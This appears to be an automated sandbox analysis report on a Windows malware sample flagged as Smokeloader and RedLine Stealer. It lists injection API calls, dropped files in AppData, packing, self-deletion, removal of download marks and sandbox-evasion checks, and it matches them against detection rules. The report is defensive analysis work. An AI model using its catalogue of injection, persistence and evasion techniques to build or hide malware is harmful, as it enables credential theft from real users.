      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014FB
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401641
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00403257 RtlCreateUserThread,NtTerminateProcess,7_2_00403257
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401606
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401613
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401627
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015FB
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00403103 RtlCreateUserThread,NtTerminateProcess,9_2_00403103
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014FB
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401641
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00403257 RtlCreateUserThread,NtTerminateProcess,9_2_00403257
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401606
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401613
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401627
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015FB
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00415C907_2_00415C90
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00415C909_2_00415C90
      Source: LgigaSKsL6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000009.00000002.2771494482.0000000002CC7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000009.00000002.2771062212.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: LgigaSKsL6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: A869.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: ajvrjra.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: vsvrjra.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@23/3
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_02C4A856 CreateToolhelp32Snapshot,Module32First,0_2_02C4A856
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vsvrjraJump to behavior
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A869.tmpJump to behavior
      Source: LgigaSKsL6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: LgigaSKsL6.exeReversingLabs: Detection: 42%
      Source: LgigaSKsL6.exeVirustotal: Detection: 40%
      Source: unknownProcess created: C:\Users\user\Desktop\LgigaSKsL6.exe "C:\Users\user\Desktop\LgigaSKsL6.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\vsvrjra C:\Users\user\AppData\Roaming\vsvrjra
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A869.exe C:\Users\user\AppData\Local\Temp\A869.exe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ajvrjra C:\Users\user\AppData\Roaming\ajvrjra
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\vsvrjra C:\Users\user\AppData\Roaming\vsvrjra
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ajvrjra C:\Users\user\AppData\Roaming\ajvrjra
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A869.exe C:\Users\user\AppData\Local\Temp\A869.exeJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeUnpacked PE file: 0.2.LgigaSKsL6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.beve:W;.cac:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\vsvrjraUnpacked PE file: 5.2.vsvrjra.400000.0.unpack .text:ER;.rdata:R;.data:W;.beve:W;.cac:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Local\Temp\A869.exeUnpacked PE file: 7.2.A869.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.moboge:W;.woyucad:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\ajvrjraUnpacked PE file: 9.2.ajvrjra.400000.0.unpack .text:ER;.rdata:R;.data:W;.moboge:W;.woyucad:W;.rsrc:R; vs .text:EW;
      Source: LgigaSKsL6.exeStatic PE information: section name: .beve
      Source: LgigaSKsL6.exeStatic PE information: section name: .cac
      Source: A869.exe.1.drStatic PE information: section name: .moboge
      Source: A869.exe.1.drStatic PE information: section name: .woyucad
      Source: ajvrjra.1.drStatic PE information: section name: .moboge
      Source: ajvrjra.1.drStatic PE information: section name: .woyucad
      Source: vsvrjra.1.drStatic PE information: section name: .beve
      Source: vsvrjra.1.drStatic PE information: section name: .cac
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_02C4E2AF push esp; ret 0_2_02C4E2B1
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_02C4D14F pushfd ; iretd 0_2_02C4D150
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_02C4C652 push B63524ADh; retn 001Fh0_2_02C4C689
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_02FC1540 pushad ; ret 0_2_02FC1550
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_004031DB push eax; ret 5_2_004032AB
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_02CC1540 pushad ; ret 5_2_02CC1550
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_02D7E097 push esp; ret 5_2_02D7E099
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_02D7CF37 pushfd ; iretd 5_2_02D7CF38
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_02D7C43A push B63524ADh; retn 001Fh5_2_02D7C471
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00402842 pushad ; retf F6A4h7_2_004029D1
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00401065 pushfd ; retf 7_2_0040106A
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00402805 push 21CACAEFh; iretd 7_2_0040280A
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00402511 push ebp; iretd 7_2_00402523
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00403325 push eax; ret 7_2_004033F3
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00403433 pushad ; ret 7_2_004035AB
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00401182 push esp; retf 7_2_0040118E
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00402A9D pushad ; retf 7_2_00402AAB
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_004012B7 push cs; iretd 7_2_004012B8
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_02BA11E9 push esp; retf 7_2_02BA11F5
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_02BA10CC pushfd ; retf 7_2_02BA10D1
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_02BA131E push cs; iretd 7_2_02BA131F
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_02BA2B04 pushad ; retf 7_2_02BA2B12
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_02BA2578 push ebp; iretd 7_2_02BA258A
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_02BA286C push 21CACAEFh; iretd 7_2_02BA2871
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00402842 pushad ; retf F6A4h9_2_004029D1
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00401065 pushfd ; retf 9_2_0040106A
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00402805 push 21CACAEFh; iretd 9_2_0040280A
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_00402511 push ebp; iretd 9_2_00402523
      Source: LgigaSKsL6.exeStatic PE information: section name: .text entropy: 7.53432336875115
      Source: A869.exe.1.drStatic PE information: section name: .text entropy: 7.543174328690701
      Source: ajvrjra.1.drStatic PE information: section name: .text entropy: 7.543174328690701
      Source: vsvrjra.1.drStatic PE information: section name: .text entropy: 7.53432336875115
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A869.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ajvrjraJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vsvrjraJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ajvrjraJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vsvrjraJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\lgigasksl6.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vsvrjra:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ajvrjra:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\vsvrjraAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\vsvrjraAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Local\Temp\A869.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Local\Temp\A869.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\ajvrjraAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\ajvrjraAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: LgigaSKsL6.exe, 00000000.00000002.1816189984.0000000002C3E000.00000004.00000020.00020000.00000000.sdmp, vsvrjra, 00000005.00000002.2075742715.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, A869.exe, 00000007.00000002.2440436895.0000000002C0E000.00000004.00000020.00020000.00000000.sdmp, ajvrjra, 00000009.00000002.2771242999.0000000002CBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00401E65 rdtsc 7_2_00401E65
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 408Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1015Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 655Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2369Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6892Thread sleep count: 408 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6916Thread sleep count: 1015 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6916Thread sleep time: -101500s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 6908Thread sleep count: 655 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6908Thread sleep time: -65500s >= -30000sJump to behavior
